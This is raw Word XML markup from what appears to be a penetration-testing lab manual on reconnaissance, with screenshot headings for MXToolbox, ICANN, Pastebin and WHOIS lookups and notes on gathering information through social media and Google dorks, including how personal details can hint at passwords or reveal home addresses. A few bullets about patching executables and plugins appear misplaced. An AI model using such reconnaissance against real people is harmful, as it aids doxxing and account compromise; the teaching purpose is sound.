    </w:p>
    <w:p w14:paraId="3AE7053D" w14:textId="77777777" w:rsidR="00BF2E6C" w:rsidRPr="001C411D" w:rsidRDefault="00BF2E6C" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BC0BC1E" w14:textId="77777777" w:rsidR="00BF2E6C" w:rsidRPr="001C411D" w:rsidRDefault="00BF2E6C" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFDA543" w14:textId="77777777" w:rsidR="00D332B8" w:rsidRPr="001C411D" w:rsidRDefault="00D332B8" w:rsidP="00DF4764">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033D7D64" w14:textId="7D174623" w:rsidR="002625AC" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="604D5830" wp14:editId="664195A8">
            <wp:extent cx="5934710" cy="318262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37075514" w14:textId="77777777" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506C536F" w14:textId="1FC5E1B3" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MXTOOLBOX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377E862" w14:textId="1C7AC1A2" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C632E68" wp14:editId="273E6B2E">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3DFDA" w14:textId="77777777" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C85EFC" w14:textId="77777777" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39EA3053" w14:textId="5FB4CB8C" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ICANN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079569FD" w14:textId="5115E05A" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F4CB81B" wp14:editId="1B1716E5">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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AF355C" w14:textId="77777777" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D6E899E" w14:textId="13195301" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PASTEBIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789562FA" w14:textId="160307E2" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F5277">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D5234B5" wp14:editId="4E94E08C">
            <wp:extent cx="5943600" cy="2802255"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="168" name="Picture 1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47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2802255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B8D4D0" w14:textId="77777777" w:rsidR="00093C15" w:rsidRDefault="00093C15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524093F1" w14:textId="77777777" w:rsidR="00037E6B" w:rsidRDefault="00037E6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E4FA11" w14:textId="03589D4F" w:rsidR="00037E6B" w:rsidRDefault="00037E6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WHOIS DOMAIN TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F299F1" w14:textId="2879CEAE" w:rsidR="00093C15" w:rsidRDefault="00037E6B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63FAB03E" wp14:editId="67147B1D">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>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C15">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="508A5381" w14:textId="00EAB371" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513" w:rsidP="00DE3513">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3330"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">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76076" w:rsidRPr="001C411D" w14:paraId="1C6A1853" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01BCFC48" w14:textId="77777777"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0435BB96" w14:textId="77777777" w:rsidR="00376076" w:rsidRPr="001C411D" w:rsidRDefault="00376076" w:rsidP="00376076">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376076" w:rsidRPr="001C411D" w14:paraId="7ECE1FDE" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A27146C" w14:textId="77777777"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3C82BE5F" w14:textId="77777777" w:rsidR="00376076" w:rsidRPr="001C411D" w:rsidRDefault="00376076" w:rsidP="00376076">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376076" w:rsidRPr="001C411D" w14:paraId="078DB2C3" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58474AE7" w14:textId="77777777"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38AAB27A" w14:textId="77777777" w:rsidR="00376076" w:rsidRPr="001C411D" w:rsidRDefault="00376076" w:rsidP="00376076">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376076" w:rsidRPr="001C411D" w14:paraId="172F0BAA" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C3CE522" w14:textId="2F5C9143"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376076" w:rsidRPr="001C411D" w14:paraId="7A50ADD6" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D3D7B87" w14:textId="77777777"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5F5FD3E4" w14:textId="77777777" w:rsidR="00376076" w:rsidRPr="001C411D" w:rsidRDefault="00376076" w:rsidP="00376076">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00376076" w:rsidRPr="001C411D" w14:paraId="72A111E4" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AB8A8C3" w14:textId="77777777" w:rsidR="00376076" w:rsidRPr="001C411D" w:rsidRDefault="00376076" w:rsidP="00376076">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217723B1" w14:textId="77777777" w:rsidR="00376076" w:rsidRPr="001C411D" w:rsidRDefault="00376076" w:rsidP="00376076">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28385ACE" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513" w:rsidP="00DE3513">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DE3513" w:rsidRPr="001C411D" w14:paraId="4E62FFF3" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="150057CC" w14:textId="77777777" w:rsidR="00DF4764" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513"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r w:rsidR="00DF4764" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4934E11C" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="0032244B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0CACCB43" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="0032244B">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about the first phase of Penetration Testing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BFE85E1" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="0032244B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="60"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE3513" w:rsidRPr="001C411D" w14:paraId="7E7ADB57" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4701E6BE" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513"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2EFDDC38" w14:textId="77777777" w:rsidR="00BE22A5" w:rsidRPr="001C411D" w:rsidRDefault="00BE22A5" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5BF617F9" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A90352">
            <w:p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understand how to gather information available on google freely using google dorks</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B029E2D" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE3513" w:rsidRPr="001C411D" w14:paraId="3E115027" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A3DA53F" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513"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39F9397B" w14:textId="77777777" w:rsidR="00BE22A5" w:rsidRPr="001C411D" w:rsidRDefault="00BE22A5" w:rsidP="00BE22A5">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="291EE420" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00A90352">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Gather information using Social Networking sites and google Dorks</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21225B32" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE3513" w:rsidRPr="001C411D" w14:paraId="5A29E48C" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="393CAA7B" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513"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67650101" w14:textId="77777777" w:rsidR="00DE3513" w:rsidRPr="001C411D" w:rsidRDefault="00DE3513" w:rsidP="00F3558E">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="28E478C7" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="003555DF" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>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D</w:t>
            </w:r>
            <w:r w:rsidR="00A90352" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A90352" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Google is an Attacker's Ally</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FFA35F8" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>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Lot of information freely available via Internet on public platform</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CF55678" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>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 xml:space="preserve">Personal information on company website or a social media site, that give hints to user account password. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B02F83D" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>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Names can be entered in a search engine to reveal home addresses and telephone numbers.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BF9E9F2" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Saves patches between sessions, writes them back to executable file and updates fixups</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D909BB8" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Open architecture - many third-party plugins are available</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FB29B29" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="00CF046C">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
